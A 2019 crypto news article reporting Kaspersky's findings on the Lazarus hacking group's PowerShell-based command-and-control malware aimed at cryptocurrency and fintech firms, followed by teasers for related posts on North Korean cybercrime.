Report: Lazarus Hacker Group Adopts New Methods, Continues Targeting Crypto

Published at: March 27, 2019

Alleged North Korea-sponsored cybercrime group Lazarus is still targeting cryptocurrencies and adopting new tactics, according to a new report from cybersecurity and anti-virus company Kaspersky Lab published on March 26.

The report reveals that allegedly state-sponsored hacker group Lazarus has been active with a new operation since last November, wherein the group uses PowerShell that allows them to manage and control Windows and macOS malware. The Lazarus team has reportedly developed custom PowerShell scripts that interact with C2 malicious servers and execute commands from the operator.

C2 server script names, in their turn, are misrepresented as WordPress files, and other open source projects. Once the malware control session with the server is created, the malware is able to download and upload files, update malware configuration and collect basic host information, among others.

Kaspersky notes that the hackers are still targeting systems involved in the cryptocurrency and fintech industries, and advised players in those sectors to exercise caution: 

“If you’re part of the booming cryptocurrency or technological startup industry, exercise extra caution when dealing with new third parties or installing software on your systems [...] And never ‘Enable Content’ (macro scripting) in Microsoft Office documents received from new or untrusted sources…”

As previously reported, Lazarus is purportedly responsible for $571 million of the $882 million in cryptocurrency that was stolen from online exchanges from 2017–2018; almost 65 percent of the total sum. Out of 14 separate exchange breaches, five were attributed to the group, among them the industry record-breaking $532 million NEM hack of Japan’s Coincheck.Earlier in March, Cointelegraph reported that North Korea has reportedly amassed $670 million in fiat and cryptocurrencies by conducting hacking attacks, wherein the hackers attacked overseas financial institutions from 2015 to 2018 and purportedly used blockchain “to cover their tracks.”

Tags
Related Posts
North Korea’s ‘Bureau 121’ Has an Army of 6000 Hackers
A report unveiled by the U.S. Army reveals that North Korea now has more than 6,000 hackers stationed in countries such as Belarus, China, India, Malaysia, Russia, among others. The operations of four sub divisions are overseen by Bureau 121, the cyber warfare guidance unit of the hermit nation. The report, named North Korean Tactics, suggests the hackers do not exclusively launch cyberattacks from North Korea itself, as the country lacks the IT infrastructure to deploy the massive campaigns. Financial crimes division The “financial crime division” called the Bluenoroff Group has around 1,700 members and is dedicated to crypto crimes …
Blockchain / Aug. 19, 2020
UN Panel Says North Korea Obtained $670 Million in Crypto and Fiat via Hacking: Report
North Korea has reportedly amassed $670 million in fiat and cryptocurrencies by conducting hacking attacks, Asia-focused financial newspaper Nikkei Asian Review reports on Friday, March 8. The publication cites a U.N. Security Council report. The report, prepared by a panel of experts, was presented to the Security Council's North Korea sanctions committee ahead of its annual report. According to the documents obtained by Nikkei, the hackers attacked overseas financial institutions from 2015 to 2018 and purportedly used blockchain “to cover their tracks.” As cited by Nikkei, the report states that the attack were allegedly conducted by a specialized corps within …
Blockchain / March 8, 2019
Digital intelligence must overcome challenges to solving crypto crimes
While the value of cryptocurrencies has varied wildly in the last year, this has not diminished crypto’s attractiveness to criminals. Many of them are moving their illegal activities underground and outside the view of law enforcement. Because of the public nature of most blockchains, however, this rapid movement shouldn’t be a major concern to law enforcement agencies. With the right tools and training, following the proceeds of crypto-enabled crime is actually not as difficult as it may seem. However, intelligence agencies must have a cryptocurrency investigation plan that includes the right tools to lawfully collect digital evidence and the properly …
Technology / Aug. 20, 2021
Expert Warns: Don’t Trust Ransomware Groups Amid Pandemic
A cybersecurity expert explained why he is convinced that the promises made by ransomware groups amid the pandemic are irrelevant. Brett Callow — threat analyst at cybersecurity firm Emsisoft — told Cointelegraph that multiple ransomware groups recently made promises to halt their activity against medical organizations amid the coronavirus pandemic. Still, he believes that those promises are irrelevant: “The claims of a ceasefire made by ransomware groups are irrelevant [and] should be completely disregarded. Would you leave your front door unlocked simply because the local burglars had pinky-promised not to rob you? Probably not. The story of the frog and …
Blockchain / April 16, 2020
‘Nobody is holding them back’ — North Korean cyber-attack threat rises
North Korea-backed cyberattacks on cryptocurrency and tech firms will only become more sophisticated over time as the country battles prolonged economic sanctions and resource shortages. Former CIA analyst Soo Kim told CNN on Sunday that the process of generating overseas crypto income for the regime has now become a “way of life” for the North Koreans: “In light of the challenges that the regime is facing — food shortages, fewer countries willing to engage with North Korea [...] this is just going to be something that they will continue to use because nobody is holding them back, essentially.” She also …
Blockchain / July 12, 2022